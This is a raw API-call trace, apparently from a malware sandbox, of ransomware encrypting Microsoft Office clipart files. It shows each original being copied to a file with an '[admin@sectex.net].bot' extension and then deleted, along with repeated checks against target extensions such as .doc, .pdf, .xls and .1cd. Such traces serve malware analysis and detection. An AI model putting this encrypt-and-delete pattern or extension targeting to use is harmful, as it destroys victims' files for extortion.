	[0144.164] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00121_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0144.164] GetLastError () returned 0x0
	[0144.164] ReadFile (in: hFile=0x3c0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x2040, lpOverlapped=0x0) returned 1
	[0144.174] WriteFile (in: hFile=0x31c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x2050, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x2050, lpOverlapped=0x0) returned 1
	[0144.175] ReadFile (in: hFile=0x3c0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.175] WriteFile (in: hFile=0x31c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.175] SetEndOfFile (hFile=0x31c) returned 1
	[0144.175] CloseHandle (hObject=0x31c) returned 1
	[0144.175] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.175] SetEndOfFile (hFile=0x3c0) returned 1
	[0144.179] CloseHandle (hObject=0x3c0) returned 1
	[0144.179] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.180] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00121_.wmf")) returned 1
	[0144.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63
	[0144.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63
	[0144.180] lstrlenW (lpString=".doc") returned 4
	[0144.180] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.180] lstrlenW (lpString=".docx") returned 5
	[0144.180] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.180] lstrlenW (lpString=".pdf") returned 4
	[0144.180] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.180] lstrlenW (lpString=".xls") returned 4
	[0144.180] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.181] lstrlenW (lpString=".xlsx") returned 5
	[0144.181] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.181] lstrlenW (lpString=".ppt") returned 4
	[0144.181] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63
	[0144.181] lstrlenW (lpString=".zip") returned 4
	[0144.181] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.181] lstrlenW (lpString=".rar") returned 4
	[0144.181] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.181] lstrlenW (lpString=".bz2") returned 4
	[0144.181] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.181] lstrlenW (lpString=".7z") returned 3
	[0144.181] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63
	[0144.181] lstrlenW (lpString=".dbf") returned 4
	[0144.181] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63
	[0144.181] lstrlenW (lpString=".1cd") returned 4
	[0144.181] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63
	[0144.181] lstrlenW (lpString=".jpg") returned 4
	[0144.181] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63
	[0144.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63
	[0144.181] lstrlenW (lpString=".doc") returned 4
	[0144.181] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.181] lstrlenW (lpString=".docx") returned 5
	[0144.181] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.181] lstrlenW (lpString=".pdf") returned 4
	[0144.181] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.181] lstrlenW (lpString=".xls") returned 4
	[0144.181] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.181] lstrlenW (lpString=".xlsx") returned 5
	[0144.182] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.182] lstrlenW (lpString=".ppt") returned 4
	[0144.182] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63
	[0144.182] lstrlenW (lpString=".zip") returned 4
	[0144.182] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.182] lstrlenW (lpString=".rar") returned 4
	[0144.182] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.182] lstrlenW (lpString=".bz2") returned 4
	[0144.182] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.182] lstrlenW (lpString=".7z") returned 3
	[0144.182] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63
	[0144.182] lstrlenW (lpString=".dbf") returned 4
	[0144.182] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63
	[0144.182] lstrlenW (lpString=".1cd") returned 4
	[0144.182] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63
	[0144.182] lstrlenW (lpString=".jpg") returned 4
	[0144.182] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.182] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0144.183] lstrlenW (lpString="DD00687_.WMF") returned 12
	[0144.183] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00687_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0144.183] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=20784) returned 1
	[0144.183] CloseHandle (hObject=0x3c0) returned 1
	[0144.183] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00687_.wmf")) returned 0x20
	[0144.183] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00687_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.183] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00687_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0144.183] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.184] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.184] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00687_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0144.184] GetLastError () returned 0x0
	[0144.184] ReadFile (in: hFile=0x3c0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x5130, lpOverlapped=0x0) returned 1
	[0144.187] WriteFile (in: hFile=0x31c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x5140, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x5140, lpOverlapped=0x0) returned 1
	[0144.189] ReadFile (in: hFile=0x3c0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.189] WriteFile (in: hFile=0x31c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.189] SetEndOfFile (hFile=0x31c) returned 1
	[0144.189] CloseHandle (hObject=0x31c) returned 1
	[0144.189] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.189] SetEndOfFile (hFile=0x3c0) returned 1
	[0144.191] CloseHandle (hObject=0x3c0) returned 1
	[0144.191] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.191] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00687_.wmf")) returned 1
	[0144.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63
	[0144.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63
	[0144.192] lstrlenW (lpString=".doc") returned 4
	[0144.192] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.192] lstrlenW (lpString=".docx") returned 5
	[0144.192] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.192] lstrlenW (lpString=".pdf") returned 4
	[0144.192] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.192] lstrlenW (lpString=".xls") returned 4
	[0144.192] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.192] lstrlenW (lpString=".xlsx") returned 5
	[0144.192] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.192] lstrlenW (lpString=".ppt") returned 4
	[0144.192] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63
	[0144.192] lstrlenW (lpString=".zip") returned 4
	[0144.192] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.192] lstrlenW (lpString=".rar") returned 4
	[0144.192] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.192] lstrlenW (lpString=".bz2") returned 4
	[0144.193] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.193] lstrlenW (lpString=".7z") returned 3
	[0144.193] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63
	[0144.193] lstrlenW (lpString=".dbf") returned 4
	[0144.193] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63
	[0144.193] lstrlenW (lpString=".1cd") returned 4
	[0144.193] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63
	[0144.193] lstrlenW (lpString=".jpg") returned 4
	[0144.193] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63
	[0144.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63
	[0144.193] lstrlenW (lpString=".doc") returned 4
	[0144.193] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.193] lstrlenW (lpString=".docx") returned 5
	[0144.193] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.193] lstrlenW (lpString=".pdf") returned 4
	[0144.193] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.193] lstrlenW (lpString=".xls") returned 4
	[0144.193] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.193] lstrlenW (lpString=".xlsx") returned 5
	[0144.193] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.193] lstrlenW (lpString=".ppt") returned 4
	[0144.193] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63
	[0144.193] lstrlenW (lpString=".zip") returned 4
	[0144.193] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.193] lstrlenW (lpString=".rar") returned 4
	[0144.193] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.193] lstrlenW (lpString=".bz2") returned 4
	[0144.194] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.194] lstrlenW (lpString=".7z") returned 3
	[0144.194] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63
	[0144.194] lstrlenW (lpString=".dbf") returned 4
	[0144.194] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63
	[0144.194] lstrlenW (lpString=".1cd") returned 4
	[0144.194] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63
	[0144.194] lstrlenW (lpString=".jpg") returned 4
	[0144.194] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.194] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0144.194] lstrlenW (lpString="DD00705_.WMF") returned 12
	[0144.194] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00705_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0144.194] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=24588) returned 1
	[0144.195] CloseHandle (hObject=0x3c0) returned 1
	[0144.195] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00705_.wmf")) returned 0x20
	[0144.195] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00705_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.195] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00705_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0144.195] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.195] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.195] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00705_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0144.196] GetLastError () returned 0x0
	[0144.196] ReadFile (in: hFile=0x3c0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x600c, lpOverlapped=0x0) returned 1
	[0144.200] WriteFile (in: hFile=0x31c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x6010, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x6010, lpOverlapped=0x0) returned 1
	[0144.201] ReadFile (in: hFile=0x3c0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.201] WriteFile (in: hFile=0x31c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.201] SetEndOfFile (hFile=0x31c) returned 1
	[0144.202] CloseHandle (hObject=0x31c) returned 1
	[0144.202] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.202] SetEndOfFile (hFile=0x3c0) returned 1
	[0144.205] CloseHandle (hObject=0x3c0) returned 1
	[0144.205] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.205] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00705_.wmf")) returned 1
	[0144.206] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63
	[0144.206] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63
	[0144.206] lstrlenW (lpString=".doc") returned 4
	[0144.206] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.206] lstrlenW (lpString=".docx") returned 5
	[0144.206] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.206] lstrlenW (lpString=".pdf") returned 4
	[0144.206] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.206] lstrlenW (lpString=".xls") returned 4
	[0144.206] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.206] lstrlenW (lpString=".xlsx") returned 5
	[0144.206] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.206] lstrlenW (lpString=".ppt") returned 4
	[0144.206] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.206] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63
	[0144.206] lstrlenW (lpString=".zip") returned 4
	[0144.206] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.206] lstrlenW (lpString=".rar") returned 4
	[0144.206] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.206] lstrlenW (lpString=".bz2") returned 4
	[0144.206] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.206] lstrlenW (lpString=".7z") returned 3
	[0144.206] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.206] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63
	[0144.206] lstrlenW (lpString=".dbf") returned 4
	[0144.206] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.206] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63
	[0144.206] lstrlenW (lpString=".1cd") returned 4
	[0144.206] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.206] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63
	[0144.206] lstrlenW (lpString=".jpg") returned 4
	[0144.206] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63
	[0144.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63
	[0144.207] lstrlenW (lpString=".doc") returned 4
	[0144.207] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.207] lstrlenW (lpString=".docx") returned 5
	[0144.207] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.207] lstrlenW (lpString=".pdf") returned 4
	[0144.207] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.207] lstrlenW (lpString=".xls") returned 4
	[0144.207] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.207] lstrlenW (lpString=".xlsx") returned 5
	[0144.207] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.207] lstrlenW (lpString=".ppt") returned 4
	[0144.207] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63
	[0144.207] lstrlenW (lpString=".zip") returned 4
	[0144.207] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.207] lstrlenW (lpString=".rar") returned 4
	[0144.207] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.207] lstrlenW (lpString=".bz2") returned 4
	[0144.207] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.207] lstrlenW (lpString=".7z") returned 3
	[0144.207] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63
	[0144.207] lstrlenW (lpString=".dbf") returned 4
	[0144.207] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63
	[0144.207] lstrlenW (lpString=".1cd") returned 4
	[0144.207] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63
	[0144.207] lstrlenW (lpString=".jpg") returned 4
	[0144.207] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.208] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0144.208] lstrlenW (lpString="DD01015_.WMF") returned 12
	[0144.208] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01015_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0144.208] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=2226) returned 1
	[0144.208] CloseHandle (hObject=0x3c0) returned 1
	[0144.208] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01015_.wmf")) returned 0x20
	[0144.208] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01015_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.208] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01015_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0144.209] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.209] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
